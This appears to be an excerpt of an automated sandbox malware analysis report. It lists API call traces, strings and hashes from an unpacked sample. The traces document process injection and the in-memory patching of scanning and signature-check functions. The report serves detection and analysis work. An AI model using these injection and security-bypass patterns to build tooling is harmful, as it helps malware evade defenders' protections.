NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000088C,0024CFF8,02A6A524,00000004,02A6A528,ScanBuffer,02A6A3D0,029F9710,ScanString,02A6A3D0,029F9710,Initialize,02A6A3D0,029F9710,0000088C,00400000), ref: 029F90FC
SetThreadContext.KERNEL32(00000884,02A6A44C,ScanBuffer,02A6A3D0,029F9710,ScanString,02A6A3D0,029F9710,Initialize,02A6A3D0,029F9710,0000088C,0024CFF8,02A6A524,00000004,02A6A528), ref: 029F9272
NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000884,00000000,00000884,02A6A44C,ScanBuffer,02A6A3D0,029F9710,ScanString,02A6A3D0,029F9710,Initialize,02A6A3D0,029F9710,0000088C,0024CFF8,02A6A524), ref: 029F927F

Part of subcall function 029EFCD8: LoadLibraryW.KERNEL32(bcrypt,029F9710,ScanString,02A6A3D0,029F9710,Initialize,02A6A3D0,029F9710,UacScan,02A6A3D0,029F9710,UacInitialize,02A6A3D0,029F9710,00000884,02A6A44C), ref: 029EFCEA
Part of subcall function 029EFCD8: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029EFCF7
Part of subcall function 029EFCD8: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000088C,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,029F9710,ScanString,02A6A3D0,029F9710,Initialize,02A6A3D0,029F9710,UacScan), ref: 029EFD0E
Part of subcall function 029EFCD8: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,029F9710,ScanString,02A6A3D0,029F9710,Initialize,02A6A3D0,029F9710,UacScan,02A6A3D0,029F9710,UacInitialize,02A6A3D0), ref: 029EFD1D

Strings

UacScan, xrefs: 029F7EF6, 029F810E, 029F8653, 029F8A4F, 029F8BC3, 029F92FC
BCryptVerifySignature, xrefs: 029F94CE
ntdll, xrefs: 029F9580, 029F9594, 029F95BC
NtSetSecurityObject, xrefs: 029F95B7
BCryptQueryProviderRegistration, xrefs: 029F94E2
bcrypt, xrefs: 029F94D3, 029F94E7, 029F94FB
UacInitialize, xrefs: 029F80B5, 029F82E9, 029F84DE, 029F85E2, 029F89DE, 029F8B52, 029F928B
I_QueryTagInformation, xrefs: 029F95A3
NtOpenObjectAuditAlarm, xrefs: 029F958F
NtReadVirtualMemory, xrefs: 029F957B
ScanString, xrefs: 029F8030, 029F81C6, 029F854F, 029F8735, 029F88BC, 029F8CD8, 029F8E96, 029F9006, 029F9179, 029F9464, 029F9511
Initialize, xrefs: 029F8167, 029F86C4, 029F884B, 029F8C34, 029F8E25, 029F8F95, 029F9108, 029F936D
advapi32, xrefs: 029F95A8
OpenSession, xrefs: 029F8237, 029F835A, 029F95D2
BCryptRegisterProvider, xrefs: 029F94F6
ScanBuffer, xrefs: 029F7E85, 029F7F4F, 029F7FD7, 029F83CB, 029F846D, 029F87A6, 029F892D, 029F8AC0, 029F8D49, 029F8F07, 029F9077, 029F91EA, 029F93DE, 029F9643

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: MemoryVirtual$LibraryWrite$AddressProcProcessThread$ContextCurrentFreeHandleLoadModule$AllocateCreateProtectReadResumeSectionUnmapUserView
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$ntdll
API String ID: 1232097254-1058128293
Opcode ID: 4c985ecf754abb6226392ebc4f668ef7d81bf9d367cba3b27203bfe65dd41e4a
Instruction ID: 89fc9a94fd6e46ed4638ceb44790de912732032fe68c7a436286580d621f5af6
Opcode Fuzzy Hash: 4c985ecf754abb6226392ebc4f668ef7d81bf9d367cba3b27203bfe65dd41e4a
Instruction Fuzzy Hash: 51D23235A012189BEB51EB64DD80BCE73BABFC5700F1198A1D109AB254DF30EE86DF95

Uniqueness

Uniqueness Score: -1.00%

Function 029D5DDC Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,029D0000,02A3A794), ref: 029D5DF8
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,029D0000,02A3A794), ref: 029D5E16
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,029D0000,02A3A794), ref: 029D5E34
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 029D5E52
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,029D5EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 029D5E9B
RegQueryValueExA.ADVAPI32(?,029D6048,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,029D5EE1,?,80000001), ref: 029D5EB9
RegCloseKey.ADVAPI32(?,029D5EE8,00000000,?,?,00000000,029D5EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 029D5EDB
lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 029D5EF8
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 029D5F05
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 029D5F0B
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 029D5F36
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 029D5F7D
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 029D5F8D
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 029D5FB5
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 029D5FC5
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 029D5FEB
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 029D5FFB

Strings

Software\Borland\Delphi\Locales, xrefs: 029D5E48
Software\Borland\Locales, xrefs: 029D5E0C, 029D5E2A

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: cce9e41a45df3847bcd1e6427380572975b6bb28ed3ac04032f3edac560d6b8b
Instruction ID: c19eeb80f32ad3868068d3388c382cf0f70701852ac01b1d11335a67777053cb
Opcode Fuzzy Hash: cce9e41a45df3847bcd1e6427380572975b6bb28ed3ac04032f3edac560d6b8b
Instruction Fuzzy Hash: FE519676A4024C7EFB21DAB4DC46FEF77AD9B44744F8080A1A704E61C1D7749A44DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 029EFD38 Relevance: 12.1, APIs: 8, Instructions: 65
librarynativeloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,029EFE14), ref: 029EFD70
GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,029EFE14), ref: 029EFD7E
GetProcAddress.KERNEL32(74AE0000,00000000), ref: 029EFD97
GetCurrentProcess.KERNEL32(02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000,00000000,029EFE14), ref: 029EFDB3
NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000,00000000,029EFE14), ref: 029EFDB9
GetCurrentProcess.KERNEL32(02A6A35C,Function_00006ADC,00000004,02A6A360,00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 029EFDE3
NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,02A6A35C,Function_00006ADC,00000004,02A6A360,00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000), ref: 029EFDE9
FreeLibrary.KERNEL32(74AE0000,00000000,02A6A35C,Function_00006ADC,00000004,02A6A360,00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000), ref: 029EFDF4

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: CurrentLibraryMemoryProcessVirtual$AddressFreeHandleLoadModuleProcProtectWrite
String ID:
API String ID: 1488642996-0
Opcode ID: e398107bb56124801a625c073cee10a8e63814e82ed7d59d24e065f38b7ee586
Instruction ID: 7fd81fb79024bcdf58eb7dbe96d49865f725ee0d03dade399f0b2780875e5606
Opcode Fuzzy Hash: e398107bb56124801a625c073cee10a8e63814e82ed7d59d24e065f38b7ee586
Instruction Fuzzy Hash: 62119374A40704BFEB00FBF8DC0AA5E77ADEB84700F548855B209F7692CB34A901AF24

Uniqueness

Uniqueness Score: -1.00%

Function 029EFCD8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40
librarynativeloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(bcrypt,029F9710,ScanString,02A6A3D0,029F9710,Initialize,02A6A3D0,029F9710,UacScan,02A6A3D0,029F9710,UacInitialize,02A6A3D0,029F9710,00000884,02A6A44C), ref: 029EFCEA
GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029EFCF7
NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000088C,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,029F9710,ScanString,02A6A3D0,029F9710,Initialize,02A6A3D0,029F9710,UacScan), ref: 029EFD0E
FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,029F9710,ScanString,02A6A3D0,029F9710,Initialize,02A6A3D0,029F9710,UacScan,02A6A3D0,029F9710,UacInitialize,02A6A3D0), ref: 029EFD1D

Strings

BCryptVerifySignature, xrefs: 029EFCF5
bcrypt, xrefs: 029EFCE9

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
String ID: BCryptVerifySignature$bcrypt
API String ID: 1002360270-4067648912
Opcode ID: dec7ec7695fe1640c704fb7054e57799260cb30f75dba453070541c8a224f21d
Instruction ID: accb639bce01640864b0261797013b22af7750290ff917ea11a3776a0ba7323d
Opcode Fuzzy Hash: dec7ec7695fe1640c704fb7054e57799260cb30f75dba453070541c8a224f21d
Instruction Fuzzy Hash: 7AF0E2722092252EE621A1246C40EBF36ADCFC27A0F14872EB55886180DB618D4892B5

Uniqueness

Uniqueness Score: -1.00%

Function 029EFB80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
librarymemorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 029EFB8D
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 029EFB93
NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 029EFBB3

Strings

C:\Windows\System32\ntdll.dll, xrefs: 029EFB88
NtAllocateVirtualMemory, xrefs: 029EFB83

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: AddressAllocateHandleMemoryModuleProcVirtual
String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
API String ID: 421316089-2206134580
Opcode ID: 4b022835230fec858520c7553dd548821eb27ebd02eef610d95f3897acb23050
Instruction ID: 34da0294d16123aee8b335465e9c5c12a0268ac2a2c512bbc8ee1fa73ae2d552
Opcode Fuzzy Hash: 4b022835230fec858520c7553dd548821eb27ebd02eef610d95f3897acb23050
Instruction Fuzzy Hash: E8E01AB654020CBBDB00DF98D845EDB37ECAB88700F04840ABA1AD7101CB34E5108B61

Uniqueness

Uniqueness Score: -1.00%

Function 02A2B768 Relevance: 7.6, APIs: 5, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 029D5228: SysAllocStringLen.OLEAUT32(?,?), ref: 029D5236

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02A2B838), ref: 02A2B7A3
NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02A2B838), ref: 02A2B7D3
NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02A2B7E8
NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02A2B814
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02A2B81D

Part of subcall function 029D4F68: SysFreeString.OLEAUT32(02A2C89C), ref: 029D4F76

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
String ID:
API String ID: 1897104825-0
Opcode ID: 53960a303edc98a2281f06c672a7a3471d7ee04ea182a5e3b711092a63fce97e
Instruction ID: 0d095f1a92bcd66ff64daf296dab8eb365d93d97207aa10d4d862b786b7be696
Opcode Fuzzy Hash: 53960a303edc98a2281f06c672a7a3471d7ee04ea182a5e3b711092a63fce97e
Instruction Fuzzy Hash: 8521CF71A40218BBEB51EBE4CC42FDEB7BDAB48704F514561F701F71C0DAB4AA059BA4

Uniqueness

Uniqueness Score: -1.00%

Function 02A2BB38 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02A2BC76

Strings

Initialize, xrefs: 02A2BB66
OpenSession, xrefs: 02A2BC18
ScanBuffer, xrefs: 02A2BBBF

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: 2220033583708748a70e66e03d8272f22f8ca1f20454b88001d9ca773bf2d22e
Instruction ID: 1f9b28ad7873800d212d8dfc66278ee13706e6e2a540ad3cbee070eab4f72536
Opcode Fuzzy Hash: 2220033583708748a70e66e03d8272f22f8ca1f20454b88001d9ca773bf2d22e
Instruction Fuzzy Hash: 87415231B00118ABDB01EBA8C941FDEB3FAFF98704F219825E441A7250DE34ED069F60

Uniqueness

Uniqueness Score: -1.00%

Function 02A2B684 Relevance: 6.1, APIs: 4, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 029D5228: SysAllocStringLen.OLEAUT32(?,?), ref: 029D5236

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02A2B756), ref: 02A2B6C3
NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02A2B6FD
NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02A2B72A
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02A2B733

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: FilePath$AllocCloseCreateNameName_StringWrite
String ID:
API String ID: 3764614163-0
Opcode ID: 101d09334be38dc5e772f645ee8a1beca5e3e0ed3cfa3c986fb648859428258e
Instruction ID: f8dc2a4eb36354a5ebb752a655c8d5954339c26af7326afd5d12c1070438f802
Opcode Fuzzy Hash: 101d09334be38dc5e772f645ee8a1beca5e3e0ed3cfa3c986fb648859428258e
Instruction Fuzzy Hash: C621C171A41218BAEB50EBE4CD42FDEB7BDAF44B04F614461B600FB1D0DBB4AB049B65

Uniqueness

Uniqueness Score: -1.00%

Function 02A2B5FC Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 029D5228: SysAllocStringLen.OLEAUT32(?,?), ref: 029D5236

RtlInitUnicodeString.N(?,?,00000000,02A2B676), ref: 02A2B624
RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02A2B676), ref: 02A2B63A
NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02A2B676), ref: 02A2B659

Part of subcall function 029D4F68: SysFreeString.OLEAUT32(02A2C89C), ref: 029D4F76

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
String ID:
API String ID: 1694942484-0
Opcode ID: bb9a37a2d1f2ccc3673f8f22f9c30ef81d32079bb7d5d53d17261869e6f73a69
Instruction ID: 84593af98e7b2b90a6e937d17eff1e4282e0b08a3f2d9c9b62d81bcadd178bfc
Opcode Fuzzy Hash: bb9a37a2d1f2ccc3673f8f22f9c30ef81d32079bb7d5d53d17261869e6f73a69
Instruction Fuzzy Hash: AB014471940208BBDB10EBA4CD41FCEB3BEEB48704F914871A601E6180EE74AB08DF64

Uniqueness

Uniqueness Score: -1.00%

Function 029EEF94 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON

Download Yara Rule

APIs

Part of subcall function 029EEF38: CLSIDFromProgID.OLE32(00000000,?,00000000,029EEF85,?,?,?,00000000), ref: 029EEF65

CoCreateInstance.OLE32(?,00000000,00000005,029EF078,00000000,00000000,029EEFF7,?,00000000,029EF067), ref: 029EEFE3

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: CreateFromInstanceProg
String ID:
API String ID: 2151042543-0
Opcode ID: 456ed9c79ecbfa3c9b4c9a1e6201b4a93957f48719c4f5c3f3446e22e816bd07
Instruction ID: 51e968aa367101911738825647c668a81214f195b77e37d754af499766cf9317
Opcode Fuzzy Hash: 456ed9c79ecbfa3c9b4c9a1e6201b4a93957f48719c4f5c3f3446e22e816bd07
Instruction Fuzzy Hash: 7E01A7706087046EFB16DF649C1287EB7ADE7CA710F924875F902D2AC0EA745900D965

Uniqueness

Uniqueness Score: -1.00%

Function 02A395F8 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00000000,02A3967E), ref: 02A39612

Part of subcall function 02A17420: GetCurrentProcessId.KERNEL32(?,00000000,02A17598), ref: 02A17441
Part of subcall function 02A17420: GlobalAddAtomA.KERNEL32(00000000), ref: 02A17474
Part of subcall function 02A17420: GetCurrentThreadId.KERNEL32 ref: 02A1748F
Part of subcall function 02A17420: GlobalAddAtomA.KERNEL32(00000000), ref: 02A174C5
Part of subcall function 02A17420: RegisterWindowMessageA.USER32(00000000,00000000,?,?,00000000,02A17598), ref: 02A174DB
Part of subcall function 02A17420: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,02A17598), ref: 02A1755F
Part of subcall function 02A17420: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 02A17570

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: AtomCurrentGlobal$AddressHandleMessageModuleProcProcessRegisterThreadVersionWindow
String ID:
API String ID: 3557136124-0
Opcode ID: d83327c89ca37f07b565577d713db7dc6a5f95d00997f8d569864175cb61aae4
Instruction ID: 94e1996cf019bf659553d661f53b4db17043ac1b577c0dfb95644eae9e564195
Opcode Fuzzy Hash: d83327c89ca37f07b565577d713db7dc6a5f95d00997f8d569864175cb61aae4
Instruction Fuzzy Hash: 07F0C239A862409FEB12EF64FDC981677AAF78A7003854830E44187358CFB4EC238F45

Uniqueness

Uniqueness Score: -1.00%

Function 02A17420 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 103
registrylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32(?,00000000,02A17598), ref: 02A17441
GlobalAddAtomA.KERNEL32(00000000), ref: 02A17474
GetCurrentThreadId.KERNEL32 ref: 02A1748F
GlobalAddAtomA.KERNEL32(00000000), ref: 02A174C5
RegisterWindowMessageA.USER32(00000000,00000000,?,?,00000000,02A17598), ref: 02A174DB

Part of subcall function 029E7B44: InitializeCriticalSection.KERNEL32(List,?,?,02A174F1,00000000,00000000,?,?,00000000,02A17598), ref: 029E7B63

Part of subcall function 02A17028: SetErrorMode.KERNEL32(00008000), ref: 02A17041
Part of subcall function 02A17028: GetModuleHandleA.KERNEL32(USER32,00000000,02A1718E,?,00008000), ref: 02A17065
Part of subcall function 02A17028: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 02A17072
Part of subcall function 02A17028: LoadLibraryA.KERNEL32(imm32.dll,00000000,02A1718E,?,00008000), ref: 02A1708E
Part of subcall function 02A17028: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 02A170B0
Part of subcall function 02A17028: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 02A170C5
Part of subcall function 02A17028: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 02A170DA
Part of subcall function 02A17028: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 02A170EF
Part of subcall function 02A17028: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 02A17104
Part of subcall function 02A17028: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 02A17119
Part of subcall function 02A17028: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 02A1712E
Part of subcall function 02A17028: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 02A17143
Part of subcall function 02A17028: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 02A17158
Part of subcall function 02A17028: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 02A1716D
Part of subcall function 02A17028: SetErrorMode.KERNEL32(?,02A17195,00008000), ref: 02A17188

Part of subcall function 02A21538: GetKeyboardLayout.USER32(00000000), ref: 02A2157D
Part of subcall function 02A21538: GetDC.USER32(00000000), ref: 02A215D2
Part of subcall function 02A21538: GetDeviceCaps.GDI32(00000000,0000005A), ref: 02A215DC
Part of subcall function 02A21538: ReleaseDC.USER32(00000000,00000000), ref: 02A215E7

Part of subcall function 02A22740: LoadIconA.USER32(00000000,MAINICON), ref: 02A22837
Part of subcall function 02A22740: GetModuleFileNameA.KERNEL32(00000000,?,00000100,?,?,?,02A17530,00000000,00000000,?,?,00000000,02A17598), ref: 02A22869
Part of subcall function 02A22740: OemToCharA.USER32(?,?), ref: 02A2287C
Part of subcall function 02A22740: CharNextA.USER32(?,00000000,?,00000100,?,?,?,02A17530,00000000,00000000,?,?,00000000,02A17598), ref: 02A228BB
